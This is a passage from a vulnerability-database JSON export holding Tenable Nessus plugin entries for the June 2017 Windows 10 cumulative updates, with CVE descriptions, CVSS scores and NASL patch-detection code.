driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. 
(CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. 
(CVE-2017-8554)\");\n # https://support.microsoft.com/en-us/help/4022727/windows-10-update-kb4022727\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?05d092f6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4022727 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-06';\nkbs = make_list(\n '4022727' # 10 1507\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"06_2017\",\n bulletin:bulletin,\n rollup_kb_list:kbs)\n )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:29:34", "description": "The remote Windows 10 version 1703 host is missing security update KB4022725. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist in Windows Uniscribe due to improper handling of objects in memory. 
An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website or to open a specially crafted document, to disclose the contents of memory. (CVE-2017-0282, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in Windows Uniscribe software due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted document, to execute arbitrary code in the context of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in the Windows GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website or open a specially crafted document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289, CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these, by convincing a user to open a specially crafted PDF file, to execute arbitrary code in the context of the current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in Microsoft Windows due to improper handling of cabinet files. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted cabinet file, to execute arbitrary code in the context of the current user. (CVE-2017-0294)\n\n - A flaw exists in Microsoft Windows due to incorrect permissions being set on folders inside the DEFAULT folder structure. An authenticated, remote attacker can exploit this, by logging in to the affected system before the user can log in, to modify the user's DEFAULT folder contents. 
(CVE-2017-0295)\n\n - An elevation of privilege vulnerability exists in tdx.sys due to a failure to check the length of a buffer prior to copying memory to it. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the DCOM object in Helppane.exe, when configured to run as the interactive user, due to a failure to properly authenticate the client. An authenticated, remote attacker can exploit this, via a specially crafted application, to run arbitrary code in another user's session after that user has logged on to the same system using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462, CVE-2017-8485)\n\n - An information disclosure vulnerability exists in Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted PDF file, to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows due to improper handling of shortcuts. An unauthenticated, remote attacker can exploit this, by convincing a user to insert a removable drive containing a malicious shortcut and binary, to automatically execute arbitrary code in the context of the current user. 
(CVE-2017-8464)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run processes in an elevated context. (CVE-2017-8465)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose sensitive information. (CVE-2017-8470, CVE-2017-8471, CVE-2017-8474, CVE-2017-8475, CVE-2017-8476, CVE-2017-8477, CVE-2017-8478, CVE-2017-8479, CVE-2017-8480, CVE-2017-8481, CVE-2017-8482, CVE-2017-8483, CVE-2017-8484, CVE-2017-8489, CVE-2017-8490, CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially crafted application, to bypass Unified Extensible Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An information disclosure vulnerability exists in Microsoft Edge due to improper handling of JavaScript XML DOM objects. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose sensitive information.\n (CVE-2017-8498)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the JavaScript scripting engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-8499)\n\n - An information disclosure vulnerability exists in Microsoft Edge in the Fetch API due to improper handling of filtered response types. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose sensitive information in the URL of a cross-origin request.\n (CVE-2017-8504)\n\n - A denial of service vulnerability exists in Windows due to improper handling of kernel mode requests. An unauthenticated, remote attacker can exploit this, via a specially crafted kernel mode request, to cause the machine to stop responding or reboot. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524, CVE-2017-8548)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Edge in the JavaScript scripting engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8520, CVE-2017-8521, CVE-2017-8549)\n\n - A same-origin policy bypass vulnerability exists in Microsoft Edge due to a failure to properly apply the Same Origin Policy for HTML elements. An unauthenticated, remote attacker can exploit this, by convincing a user to follow a link, to load a page with malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the Windows font library due to improper handling of embedded fonts. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft document, to execute arbitrary code in the context of the current user. 
(CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in Microsoft Edge due to a failure to properly enforce same-origin policies. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose information from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8547)\n\n - A security bypass vulnerability exists in Microsoft Edge in the Content Security Policy (CSP) due to improper validation of documents. An unauthenticated, remote attacker can exploit this, by convincing a user to follow a link, to cause the user to load a malicious website. (CVE-2017-8555)\n\n - An information disclosure vulnerability exists in the Windows Graphics component due to improper handling of objects in memory. An authenticated, remote attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the Windows Graphics component due to improper initialization of objects in memory. 
A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists in DirectX due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. An authenticated, remote attacker can exploit this, via a specially crafted application, to disclose the contents of memory. (CVE-2017-8554)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T00:00:00", "type": "nessus", "title": "KB4022725: Windows 10 Version 1703 June 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0282", "CVE-2017-0283", "CVE-2017-0285", "CVE-2017-0287", "CVE-2017-0288", "CVE-2017-0289", "CVE-2017-0291", "CVE-2017-0292", "CVE-2017-0294", "CVE-2017-0295", "CVE-2017-0296", "CVE-2017-0297", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0300", 
"CVE-2017-8460", "CVE-2017-8462", "CVE-2017-8464", "CVE-2017-8465", "CVE-2017-8470", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8477", "CVE-2017-8478", "CVE-2017-8479", "CVE-2017-8480", "CVE-2017-8481", "CVE-2017-8482", "CVE-2017-8483", "CVE-2017-8484", "CVE-2017-8485", "CVE-2017-8489", "CVE-2017-8490", "CVE-2017-8491", "CVE-2017-8492", "CVE-2017-8493", "CVE-2017-8498", "CVE-2017-8499", "CVE-2017-8504", "CVE-2017-8515", "CVE-2017-8517", "CVE-2017-8518", "CVE-2017-8520", "CVE-2017-8521", "CVE-2017-8522", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8527", "CVE-2017-8530", "CVE-2017-8531", "CVE-2017-8532", "CVE-2017-8533", "CVE-2017-8543", "CVE-2017-8544", "CVE-2017-8547", "CVE-2017-8548", "CVE-2017-8549", "CVE-2017-8554", "CVE-2017-8555", "CVE-2017-8575", "CVE-2017-8576", "CVE-2017-8579"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUN_4022725.NASL", "href": "https://www.tenable.com/plugins/nessus/100763", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100763);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0295\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n 
\"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8498\",\n \"CVE-2017-8499\",\n \"CVE-2017-8504\",\n \"CVE-2017-8515\",\n \"CVE-2017-8517\",\n \"CVE-2017-8518\",\n \"CVE-2017-8520\",\n \"CVE-2017-8521\",\n \"CVE-2017-8522\",\n \"CVE-2017-8523\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8530\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8548\",\n \"CVE-2017-8549\",\n \"CVE-2017-8554\",\n \"CVE-2017-8555\",\n \"CVE-2017-8575\",\n \"CVE-2017-8576\",\n \"CVE-2017-8579\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98833,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98843,\n 98845,\n 98847,\n 98848,\n 98849,\n 98850,\n 98853,\n 98854,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98863,\n 98865,\n 98867,\n 98869,\n 98870,\n 98883,\n 98884,\n 98885,\n 98886,\n 98887,\n 98892,\n 98895,\n 98900,\n 98901,\n 98902,\n 98903,\n 98904,\n 98914,\n 98920,\n 98922,\n 98923,\n 98925,\n 98926,\n 98928,\n 98929,\n 98930,\n 98932,\n 98933,\n 98942,\n 98954,\n 98955,\n 98956,\n 99210,\n 99212,\n 99215\n );\n script_xref(name:\"MSKB\", value:\"4022725\");\n script_xref(name:\"MSFT\", value:\"MS17-4022725\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/14\");\n\n script_name(english:\"KB4022725: Windows 10 Version 1703 June 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1703 host is missing security update\nKB4022725. 
It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. 
(CVE-2017-0294)\n\n - A flaw exists in Microsoft Windows due to incorrect\n permissions being set on folders inside the DEFAULT\n folder structure. An authenticated, remote attacker can\n exploit this, by logging in to the affected system\n before the user can log in, to modify the user's DEFAULT\n folder contents. (CVE-2017-0295)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. 
(CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run processes in\n an elevated context. (CVE-2017-8465)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8474, CVE-2017-8475,\n CVE-2017-8476, CVE-2017-8477, CVE-2017-8478,\n CVE-2017-8479, CVE-2017-8480, CVE-2017-8481,\n CVE-2017-8482, CVE-2017-8483, CVE-2017-8484,\n CVE-2017-8489, CVE-2017-8490, CVE-2017-8491,\n CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge due to improper handling of JavaScript\n XML DOM objects. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website, to disclose sensitive information.\n (CVE-2017-8498)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8499)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge in the Fetch API due to improper handling\n of filtered response types. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose sensitive\n information in the URL of a cross-origin request.\n (CVE-2017-8504)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or rebooting. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8520, CVE-2017-8521, CVE-2017-8549)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. 
(CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A security bypass vulnerability exists in Microsoft Edge\n in the Content Security Policy (CSP) due to improper\n validation of documents. An unauthenticated, remote\n attacker can exploit this, by convincing a user to\n follow a link, to cause the user to load a malicious\n website. 
